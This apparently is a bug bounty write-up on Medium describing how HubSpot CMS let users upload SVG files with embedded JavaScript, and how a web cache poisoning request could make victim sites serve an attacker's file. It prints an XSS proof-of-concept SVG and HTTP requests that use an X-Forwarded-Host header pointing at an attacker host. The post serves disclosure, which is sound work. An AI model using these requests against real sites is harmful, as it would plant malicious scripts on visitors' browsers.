Saving 100,000 websites from a Watering Hole attack

Background

During my bug bounty sessions, I often come across websites built with Hubspot CMS.

Initial Discovery

The initial discovery was Hubspot allowing uploading SVG images. I was able to trigger XSS on my own website by embedding javascript into my svg files. Example:

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
  • All websites hosted on hubspot use the endpoint /hs-fs/hubfs to request their media files.
  • Each Hubsopt account had a virtual CDN hosted at <portal_Id>.fs1.hubspotusercontent-na1.net

Secondary Context

For better understanding of the flow, I have imagined the following schema:

Web Cache Poisoning

Quoting Portswigger, Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users. You can read more here: https://portswigger.net/web-security/web-cache-poisoning

GET /hs-fs/hubfs/xss.svg HTTP/2 
Host: www.victim.com
X-Forwarded-Host: www.akme.com

Water in the hole

To execute the watering hole attack, hackers could target websites hosted on Hubspot and remotely replace their media with pieces of malware.

  • Host a website on Hubspot. Let’s call it www.attacker.com
  • Embed malicious script in an svg file, name it safe.svg then upload it to his website.
  • Send the following request to www.victim.com:
GET /hs-fs/hubfs/safe.svg HTTP/2 
Host: www.victim.com
X-Forwarded-Host: www.attacker.com

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store